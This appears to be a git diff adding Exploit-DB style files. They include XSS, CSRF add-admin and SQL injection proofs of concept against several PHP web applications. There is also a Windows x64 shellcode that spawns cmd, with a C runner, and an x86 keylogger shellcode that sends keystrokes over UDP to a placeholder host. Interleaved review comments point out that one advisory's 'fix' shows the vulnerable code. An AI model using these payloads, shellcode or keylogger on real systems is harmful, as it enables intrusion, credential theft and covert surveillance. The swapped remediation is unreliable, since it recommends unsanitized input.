@@ -0,0 +1,103 @@ +# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities +# Date: 2016-10-16 +# Exploit Author: larrycompress +# Contact: larrycompress@gmail.com +# Type: webapps +# Platform: PHP +# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2 +# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip +--------------------------------------------------------------------------------- + +POC as follows : + +# 0x00 Reflected XSS + +--- + +1.In public search : + +http://192.168.1.112/phptelephonedirectory/index.php?key= + +2.In administration web interface (need normal user login) : + +http://192.168.1.112/phptelephonedirectory/administration.php?key= + +# 0x01 Stored XSS + +--- + +1.In administration web directory interface (need normal user login) : + +http://192.168.1.112/phptelephonedirectory/administration.php +?pageaction=newcontact +&subaction=submit +&id=1 +&dtDOBDate=0000-00-00 +&pointcode= +&firstname= +&lastname= +&middlename= +&DOBdateradio=usenew +&dateday=16 +&datemonthnewedit=10 +&dateyearnewedit=2015 +&employeeID= +&phonenumber1= +&internalphonenumber= +&phonenumber2= +&phonenumber3= +&fax= +&mobilecell= +&email= +&alternateemail= +&chat= +&website= +&socialmedia1= +&socialmedia2= +&socialmedia3= +&contactposition= +&company= +&qualifications= +&departmentnewedit= +&buildingroom= +&address= +&city= +&suburb= +&tdstate= +&zippostcode= +&description= +&recordstatus=active + +2.In administration web department interface (need normal user login) : + +http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname= +
+ + + + + + + + +
+ + + + +* Thanks to Besim * \ No newline at end of file diff --git a/platforms/php/webapps/40553.txt b/platforms/php/webapps/40553.txt new file mode 100755 index 000000000..314abbcda --- /dev/null +++ b/platforms/php/webapps/40553.txt @@ -0,0 +1,249 @@ +# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin +# Date: 15-10-2016 +# Software Link: http://www.subrion.org/download/ +# Vendor: http://www.subrion.org +# Google Dork: "Powered by Subrion CMS" +# Exploit Author: Ahsan Tahir +# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial +# Website: www.ahsantahir.net +# Category: webapps +# Version: 4.0.5 +# Tested on: [Kali Linux 2.0 | Windows 8.1] +# Email: mrahsan1337@gmail.com + +[+] CSRF bypass to Persistent XSS + +1. Description + +There was an Anti-CSRF token while adding a post in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter +the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed +means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website, +a blog post will be created with a tag like this: "" and now the XSS can be executed +here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/ + +2. Proof of Concept (CSRF to Persistent XSS) + +Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new post named +"Hacked by Ahsan" will be created, with a tag "", means that we exploited +CSRF sucessfully! + +XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/ + +[!] PoC Code: + + + + + +
+ +
+ + + +---------------------------------------------------------------------------------------------------------------------- + +[+] Add-Admin CSRF + +1. Description + +There was an Anti-CSRF token while adding an admin in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter +the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed +means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website, +a new admin will be created with an email which is controled by attacker, means now the attacker have full administration over the +Subrion CMS Blog! + +2. Proof of Concept + +Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new admin named +"Haxor" will be created, with email "ahsan@ahsan.py", means that we exploited the CSRF sucessfully, and now the attacker +has full control over the subrion blog! + +[!] PoC Code: + + + + + +
+ +
+ + + +Credits & Authors: +================== +Ahsan Tahir - [https://twitter.com/AhsanTahirAT] \ No newline at end of file diff --git a/platforms/php/webapps/40554.txt b/platforms/php/webapps/40554.txt new file mode 100755 index 000000000..f6a60dde8 --- /dev/null +++ b/platforms/php/webapps/40554.txt @@ -0,0 +1,75 @@ +# Exploit Title: PHP Image Database - Multiple Vulnerabilities +# Date: 2016-10-16 +# Exploit Author: larrycompress +# Contact: larrycompress@gmail.com +# Type: webapps +# Platform: PHP +# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3 +# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip +---------------------------------------------------------------------------- + +POC as follows : + +# 0x00 Reflected XSS + +--- + +1.In public search : + +http://192.168.1.112/phpimagedatabase/index.php?dateyear=&key= + +2.In administration web interface (need normal user login) : + +http://192.168.1.112/phpimagedatabase/administration.php?dateyear=&key= + + +# 0x01 Stored XSS + +--- + +1.In administration web images interface (need normal user login) : + +http://192.168.1.112/phpimagedatabase/administration.php +?pageaction=newimage +&MAX_FILE_SIZE=1000000 +&subaction=submit +&dateday=16 +&datemonthnewedit=10 +&dateyearnewedit=2016 +&title= +&caption= +&keywordtags= +&photographer= +&categorynewedit= +&publish=active + +2.In administration web categories interface (need administrator user login) : + +http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname= +
+ + + + + + + + +
+ + + + +* Thanks to Besim * \ No newline at end of file diff --git a/platforms/php/webapps/40555.txt b/platforms/php/webapps/40555.txt new file mode 100755 index 000000000..ffd6680e3 --- /dev/null +++ b/platforms/php/webapps/40555.txt 
@@ -0,0 +1,51 @@ +# Exploit Title.............. Simple Shopping Cart Application SQL Injection +# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students" +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in shop/product-details.php +------------------------------- + +----snip---- + + $prodID = intval($_GET['prodid']); + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $prodname= $getProdInfo["Product"]; + +----snip---- + + +Example exploitation +-------------------- +http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+ + + +How to fix +---------- +Simple method's use the php function intval. +For example + + $prodID = $_GET['prodid']; + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $prodname= $getProdInfo["Product"]; + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40557.html b/platforms/php/webapps/40557.html new file mode 100755 index 000000000..fd5510c28 --- /dev/null +++ b/platforms/php/webapps/40557.html 
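Review bot: The audit and fix snippets appear to be swapped: the block under "The audit_list in shop/product-details.php" already has `$prodID = intval($_GET['prodid']);`, which is the remediation the advisory recommends, while the "How to fix" block shows the unsanitized `$prodID = $_GET['prodid'];`, which is the vulnerable form. As written the page labels the safe code as vulnerable and recommends the unsafe one. Either the two assignments should be exchanged, or, if the shipped source really calls intval, the union-select in the example cannot reach the query and the author should confirm which version was audited.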
@@ -0,0 +1,58 @@ +*========================================================================================================= +# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) +# Author: Meryem AKDOĞAN +# Google Dork: - +# Date: 16/10/2016 +# Type: webapps +# Platform : PHP +# Vendor Homepage: http://newsphp.sourceforge.net +# Software Link: https://sourceforge.net/projects/newsphp/ +# Version: 1.3.0 +*========================================================================================================= + + +DETAILS +======================================== + +PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in +place) meaning that if an admin user can be tricked to visit a crafted URL +created +by attacker (via spear phishing/social engineering), a form will be +submitted to (http://sitename/path/index.php) that will change admin +password. + +Once exploited, the attacker can login to the admin panel using the +username and the password he posted in the form. + + +RISK +======================================== + +Attacker can change admin password with this vulnerablity + + + +TECHNICAL DETAILS & POC +======================================== + + + + +
+ + + + + + + + +
+ + + + +======================================== diff --git a/platforms/php/webapps/40558.txt b/platforms/php/webapps/40558.txt new file mode 100755 index 000000000..753f84809 --- /dev/null +++ b/platforms/php/webapps/40558.txt @@ -0,0 +1,45 @@ +# Exploit Title.............. School Full CBT SQL Injection +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/node/9859 +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /show.php +------------------------------- + +----snip---- + +$get = $_GET['show']; + $result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error()); + +----snip---- + + +Example exploitation +-------------------- + +http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+ + + +How to fix +---------- +Simple method's use the php function intval. +For example + +$get = intval($_GET['show']); + $result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error()); + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/node/9859 +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40559.txt b/platforms/php/webapps/40559.txt new file mode 100755 index 000000000..573e4279a --- /dev/null +++ b/platforms/php/webapps/40559.txt 
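Review bot: The description contradicts the title: the `# Exploit Title` line says the CSRF adds an admin, but the DETAILS paragraph says the form submitted to index.php "will change admin password" and the RISK section repeats "Attacker can change admin password". One of the two should be corrected so a reader knows which account change the posted form performs, and the affected request parameters should be named in the text, since the form body does not survive in this listing.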
@@ -0,0 +1,85 @@ +# Exploit Title: PHP Business Directory - Multiple Vulnerabilities +# Date: 2016-10-16 +# Exploit Author: larrycompress +# Contact: larrycompress@gmail.com +# Type: webapps +# Platform: PHP +# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4 +# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip +-------------------------------------------------------------------------------- + +POC as follows : + +# 0x00 Reflected XSS + +--- + +1.In public search : + +http://192.168.1.112/phpbusinessdirectory/index.php?key=&location= + +2.In administration web interface (need normal user login) : + +http://192.168.1.112/phpbusinessdirectory/administration.php?key=&location= + +# 0x01 Stored XSS + +--- + +1.In administration web directory interface (need normal user login) : + +http://192.168.1.112/phpbusinessdirectory/administration.php +?pageaction=newsavebusiness +&subaction=submit +&businessname= +&slogan= +&businesslicence= +&address= +&city= +&suburb= +&businessstate= +&country= +&zippostcode= +&telephone2= +&mobilecell= +&fax= +&email= +&website= +&socialmedia1= +&socialmedia2= +&socialmedia3= +&productservice= +&manager= +&paymentsaccepted= + +2.In administration web categories interface (need administrator user login) : + +http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname= +
+ + + + + + + + +
+ + + + +* Thanks to Besim * \ No newline at end of file diff --git a/platforms/win_x86-64/shellcode/40549.c b/platforms/win_x86-64/shellcode/40549.c new file mode 100755 index 000000000..d65d9d046 --- /dev/null +++ b/platforms/win_x86-64/shellcode/40549.c 
@@ -0,0 +1,144 @@ +/* + # Title : Windows x64 WinExec() shellcode + # Date : 15-10-2016 + # Author : Roziul Hasan Khan Shifat + # size : 93 bytes + # Tested on : Windows 7 Ultimate x64 +*/ + + +/* +Disassembly of section .text: + +0000000000000000 <_start>: + 0: 99 cltd + 1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax + 6: 48 8b 40 18 mov 0x18(%rax),%rax + a: 48 8b 70 10 mov 0x10(%rax),%rsi + e: 48 ad lods %ds:(%rsi),%rax + 10: 48 8b 30 mov (%rax),%rsi + 13: 48 8b 7e 30 mov 0x30(%rsi),%rdi + 17: 48 31 db xor %rbx,%rbx + 1a: 48 31 f6 xor %rsi,%rsi + 1d: 8b 5f 3c mov 0x3c(%rdi),%ebx + 20: 48 01 fb add %rdi,%rbx + 23: b2 88 mov $0x88,%dl + 25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 28: 48 01 fb add %rdi,%rbx + 2b: 8b 73 1c mov 0x1c(%rbx),%esi + 2e: 48 01 fe add %rdi,%rsi + 31: 99 cltd + 32: 66 ba 27 05 mov $0x527,%dx + 36: 8b 04 96 mov (%rsi,%rdx,4),%eax + 39: 48 01 f8 add %rdi,%rax + 3c: eb 17 jmp 55 + +000000000000003e : + 3e: 59 pop %rcx + 3f: 99 cltd + 40: 48 ff c2 inc %rdx + 43: ff d0 callq *%rax + 45: 99 cltd + 46: 66 ba 29 01 mov $0x129,%dx + 4a: 8b 04 96 mov (%rsi,%rdx,4),%eax + 4d: 48 01 f8 add %rdi,%rax + 50: 48 31 c9 xor %rcx,%rcx + 53: ff d0 callq *%rax + +0000000000000055 : + 55: e8 e4 ff ff ff callq 3e + 5a: 63 6d 64 movslq 0x64(%rbp),%ebp + ... 
+*/ + + +/* +bits 64 +section .text + global _start +_start: + + +cdq +mov rax,[gs:rdx+0x60] ;PEB +mov rax,[rax+0x18] ;PEB.Ldr +mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList +lodsq +mov rsi,[rax] +mov rdi,[rsi+0x30] ;kernel32.dll base address + + +xor rbx,rbx +xor rsi,rsi + + +mov ebx,[rdi+0x3c] ;elf_anew +add rbx,rdi ;PE HEADER +mov dl,0x88 +mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress +add rbx,rdi ;IMAGE_EXPORT_DIRECTORY + +mov esi,[rbx+0x1c] ;AddressOfFunctions +add rsi,rdi + + +cdq + +mov dx,1319 ;Ordinal of WinExec() + + + + + +mov eax,[rsi+rdx*4] +add rax,rdi ;rax=WinExec() + + +;WinExec("cmd",1) + + +jmp c + +exec: +pop rcx +cdq +inc rdx +call rax + + +cdq +mov dx,297 + +mov eax,[rsi+rdx*4] +add rax,rdi ;rax=FatalExit() + +;FatalExit(0) + +xor rcx,rcx +call rax + + + +c: + +call exec +db 'cmd',0,0 +*/ + + +#include +#include +#include + + +char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64"; + + +main() +{ + int len=strlen(shellcode); + DWORD l=0; + printf("shellcode length %d bytes\n",len ); + VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l); + (* (int(*)()) shellcode ) (); +} \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40560.asm b/platforms/win_x86/shellcode/40560.asm new file mode 100755 index 000000000..699010522 --- /dev/null +++ b/platforms/win_x86/shellcode/40560.asm 
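Review bot: `main()` is declared without a return type, which relies on implicit int (removed in C99) and is rejected by recent gcc and clang defaults; it should be `int main(void)` with a `return 0;`. The return value of VirtualProtect is ignored, so if it fails the indirect call on the next line jumps into memory that was never made executable; check it with `if (!VirtualProtect(shellcode, len, PAGE_EXECUTE_READWRITE, &l)) return 1;`. `strlen(shellcode)` silently stops at the first 0x00 byte, whereas `sizeof(shellcode) - 1` gives the array length regardless of content. The header comment should also record that the code resolves WinExec and FatalExit by hard-coded kernel32 export ordinals (1319 and 297 in the asm listing), which presumably are tied to the tested Windows 7 x64 build.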
@@ -0,0 +1,266 @@ +; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes +; Date: Fri Oct 13 12:58:35 GMT 2016 +; Exploit Author: Fugu +; Vendor Homepage: www.microsoft.com +; Version: all win +; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64) +; Note: it will write to single byte payload udp packets to host. +; keystrokes are written in format: "Virtual-Key Codes", from +; msdn.microsoft.com website + +section .bss + +section .data + +section .text + global _start + _start: + cld ; 00000000 FC + call dword loc_88h ; 00000001 E882000000 + pushad ; 00000006 60 + mov ebp,esp ; 00000007 89E5 + xor eax,eax ; 00000009 31C0 + mov edx,[fs:eax+0x30] ; 0000000B 648B5030 + mov edx,[edx+0xc] ; 0000000F 8B520C + mov edx,[edx+0x14] ; 00000012 8B5214 +loc_15h: + mov esi,[edx+0x28] ; 00000015 8B7228 + movzx ecx,word [edx+0x26] ; 00000018 0FB74A26 + xor edi,edi ; 0000001C 31FF +loc_1eh: + lodsb ; 0000001E AC + cmp al,0x61 ; 0000001F 3C61 + jl loc_25h ; 00000021 7C02 + sub al,0x20 ; 00000023 2C20 +loc_25h: + ror edi,byte 0xd ; 00000025 C1CF0D + add edi,eax ; 00000028 01C7 + loop loc_1eh ; 0000002A E2F2 + push edx ; 0000002C 52 + push edi ; 0000002D 57 + mov edx,[edx+0x10] ; 0000002E 8B5210 + mov ecx,[edx+0x3c] ; 00000031 8B4A3C + mov ecx,[ecx+edx+0x78] ; 00000034 8B4C1178 + jecxz loc_82h ; 00000038 E348 + add ecx,edx ; 0000003A 01D1 + push ecx ; 0000003C 51 + mov ebx,[ecx+0x20] ; 0000003D 8B5920 + add ebx,edx ; 00000040 01D3 + mov ecx,[ecx+0x18] ; 00000042 8B4918 +loc_45h: + jecxz loc_81h ; 00000045 E33A + dec ecx ; 00000047 49 + mov esi,[ebx+ecx*4] ; 00000048 8B348B + add esi,edx ; 0000004B 01D6 + xor edi,edi ; 0000004D 31FF +loc_4fh: + lodsb ; 0000004F AC + ror edi,byte 0xd ; 00000050 C1CF0D + add edi,eax ; 00000053 01C7 + cmp al,ah ; 00000055 38E0 + jnz loc_4fh ; 00000057 75F6 + add edi,[ebp-0x8] ; 00000059 037DF8 + cmp edi,[ebp+0x24] ; 0000005C 3B7D24 + jnz loc_45h ; 0000005F 75E4 + pop eax ; 00000061 58 + mov ebx,[eax+0x24] ; 00000062 8B5824 + add ebx,edx 
; 00000065 01D3 + mov cx,[ebx+ecx*2] ; 00000067 668B0C4B + mov ebx,[eax+0x1c] ; 0000006B 8B581C + add ebx,edx ; 0000006E 01D3 + mov eax,[ebx+ecx*4] ; 00000070 8B048B + add eax,edx ; 00000073 01D0 + mov [esp+0x24],eax ; 00000075 89442424 + pop ebx ; 00000079 5B + pop ebx ; 0000007A 5B + popad ; 0000007B 61 + pop ecx ; 0000007C 59 + pop edx ; 0000007D 5A + push ecx ; 0000007E 51 + jmp eax ; 0000007F FFE0 +loc_81h: + pop edi ; 00000081 5F +loc_82h: + pop edi ; 00000082 5F + pop edx ; 00000083 5A + mov edx,[edx] ; 00000084 8B12 + jmp short loc_15h ; 00000086 EB8D +loc_88h: + pop ebp ; 00000088 5D + push dword 0x3233 ; 00000089 6833320000 + push dword 0x5f327377 ; 0000008E 687773325F + push esp ; 00000093 54 + push dword 0x726774c ; 00000094 684C772607 + call ebp ; 00000099 FFD5 + mov eax,0x190 ; 0000009B B890010000 + sub esp,eax ; 000000A0 29C4 + push esp ; 000000A2 54 + push eax ; 000000A3 50 + push dword 0x6b8029 ; 000000A4 6829806B00 + call ebp ; 000000A9 FFD5 + push byte +0x10 ; 000000AB 6A10 + jmp dword loc_1ceh ; 000000AD E91C010000 +loc_b2h: + push dword 0x803428a9 ; 000000B2 68A9283480 + call ebp ; 000000B7 FFD5 + lea esi,[eax+0x1c] ; 000000B9 8D701C + xchg esi,esp ; 000000BC 87F4 + pop eax ; 000000BE 58 + xchg esp,esi ; 000000BF 87E6 + mov esi,eax ; 000000C1 89C6 + push dword 0x6c6c ; 000000C3 686C6C0000 + push dword 0x642e7472 ; 000000C8 6872742E64 + push dword 0x6376736d ; 000000CD 686D737663 + push esp ; 000000D2 54 + push dword 0x726774c ; 000000D3 684C772607 + call ebp ; 000000D8 FFD5 + jmp dword loc_1e3h ; 000000DA E904010000 +loc_dfh: + push dword 0xd1ecd1f ; 000000DF 681FCD1E0D + call ebp ; 000000E4 FFD5 + xchg ah,al ; 000000E6 86E0 + ror eax,byte 0x10 ; 000000E8 C1C810 + inc eax ; 000000EB 40 + inc eax ; 000000EC 40 + push esi ; 000000ED 56 + push eax ; 000000EE 50 + mov esi,esp ; 000000EF 89E6 + xor eax,eax ; 000000F1 31C0 + push eax ; 000000F3 50 + push eax ; 000000F4 50 + push eax ; 000000F5 50 + push eax ; 000000F6 50 + inc eax ; 000000F7 40 + inc 
eax ; 000000F8 40 + push eax ; 000000F9 50 + push eax ; 000000FA 50 + push dword 0xe0df0fea ; 000000FB 68EA0FDFE0 + call ebp ; 00000100 FFD5 + mov edi,eax ; 00000102 89C7 +loc_104h: + push byte +0x10 ; 00000104 6A10 + push esi ; 00000106 56 + push edi ; 00000107 57 + push dword 0x6174a599 ; 00000108 6899A57461 + call ebp ; 0000010D FFD5 + test eax,eax ; 0000010F 85C0 + jz loc_122h ; 00000111 740F + dec dword [esi+0x8] ; 00000113 FF4E08 + jnz loc_104h ; 00000116 75EC + xor eax,eax ; 00000118 31C0 + push eax ; 0000011A 50 + push dword 0x56a2b5f0 ; 0000011B 68F0B5A256 + call ebp ; 00000120 FFD5 +loc_122h: + push dword 0x3233 ; 00000122 6833320000 + push dword 0x72657375 ; 00000127 6875736572 + push esp ; 0000012C 54 + push dword 0x726774c ; 0000012D 684C772607 + call ebp ; 00000132 FFD5 + push dword 0x657461 ; 00000134 6861746500 + push dword 0x74537965 ; 00000139 6865795374 + push dword 0x4b746547 ; 0000013E 684765744B + push esp ; 00000143 54 + push eax ; 00000144 50 + push dword 0x7802f749 ; 00000145 6849F70278 + call ebp ; 0000014A FFD5 + push esi ; 0000014C 56 + push edi ; 0000014D 57 + push eax ; 0000014E 50 + xor ecx,ecx ; 0000014F 31C9 + mov esi,ecx ; 00000151 89CE + mov cl,0x8 ; 00000153 B108 +loc_155h: + push esi ; 00000155 56 + loop loc_155h ; 00000156 E2FD +loc_158h: + xor ecx,ecx ; 00000158 31C9 + xor esi,esi ; 0000015A 31F6 + push byte +0x8 ; 0000015C 6A08 + push dword 0xe035f044 ; 0000015E 6844F035E0 + call ebp ; 00000163 FFD5 +loc_165h: + mov eax,esi ; 00000165 89F0 + cmp al,0xff ; 00000167 3CFF + jnc loc_158h ; 00000169 73ED + inc esi ; 0000016B 46 + push esi ; 0000016C 56 + call dword [esp+0x24] ; 0000016D FF542424 + mov edx,esi ; 00000171 89F2 + xor ecx,ecx ; 00000173 31C9 + mov cl,0x80 ; 00000175 B180 + and eax,ecx ; 00000177 21C8 + xor ecx,ecx ; 00000179 31C9 + cmp eax,ecx ; 0000017B 39C8 + jnz loc_18fh ; 0000017D 7510 + xor edx,edx ; 0000017F 31D2 + mov ecx,edx ; 00000181 89D1 + mov eax,esi ; 00000183 89F0 + mov cl,0x20 ; 00000185 B120 + div ecx 
; 00000187 F7F1 + btr [esp+eax*4],edx ; 00000189 0FB31484 + jmp short loc_165h ; 0000018D EBD6 +loc_18fh: + xor edx,edx ; 0000018F 31D2 + mov ecx,edx ; 00000191 89D1 + mov eax,esi ; 00000193 89F0 + mov cl,0x20 ; 00000195 B120 + div ecx ; 00000197 F7F1 + bt [esp+eax*4],edx ; 00000199 0FA31484 + jc loc_165h ; 0000019D 72C6 + xor edx,edx ; 0000019F 31D2 + mov ecx,edx ; 000001A1 89D1 + mov eax,esi ; 000001A3 89F0 + mov cl,0x20 ; 000001A5 B120 + div ecx ; 000001A7 F7F1 + bts [esp+eax*4],edx ; 000001A9 0FAB1484 + push esi ; 000001AD 56 + push byte +0x10 ; 000001AE 6A10 + push dword [esp+0x30] ; 000001B0 FF742430 + push byte +0x0 ; 000001B4 6A00 + push byte +0x1 ; 000001B6 6A01 + lea ecx,[esp+0x10] ; 000001B8 8D4C2410 + push ecx ; 000001BC 51 + push dword [esp+0x3c] ; 000001BD FF74243C + push dword 0xdf5c9d75 ; 000001C1 68759D5CDF + call ebp ; 000001C6 FFD5 + lea esp,[esp+0x4] ; 000001C8 8D642404 + jmp short loc_158h ; 000001CC EB8A +loc_1ceh: + call dword loc_b2h ; 000001CE E8DFFEFFFF + db "www.example.com",0 +loc_1e3h: + call dword loc_dfh + db "4444",0 + +;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b" +;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c" +;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" +;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20" +;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac" +;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" +;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" +;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" +;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00" +;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01" +;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87" +;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73" 
+;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68" +;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89" +;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0" +;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85" +;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56" +;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77" +;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47" +;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31" +;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44" +;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24" +;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31" +;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31" +;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31" +;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10" +;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24" +;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf" +;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63" +;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00" \ No newline at end of file diff --git a/platforms/windows/dos/40536.py b/platforms/windows/dos/40536.py new file mode 100755 index 000000000..0c86cf721 --- /dev/null +++ b/platforms/windows/dos/40536.py 
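Review bot: None of the `push dword 0x...; call ebp` sites carries a comment naming the function that hash resolves to, and the `push byte +0x10` before the jump to loc_1ceh has no comment saying what the value is for, so a reader checking the listing has to recompute every hash; each call site should be annotated with the resolved import, e.g. `; LoadLibraryA` on the three pushes of `0x726774c` that follow the "ws2_32", "msvcrt.dll" and "user32" string pushes. The header's `; Note:` line is garbled ("it will write to single byte payload udp packets to host") and `; Version: all win` is broader than the `; Tested on:` list; both should be tightened. The hex dump at the end duplicates the assembled bytes including the `www.example.com` and `4444` placeholders, so it goes stale as soon as the strings are edited; a comment should say which of the two is authoritative, or the dump should be dropped.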
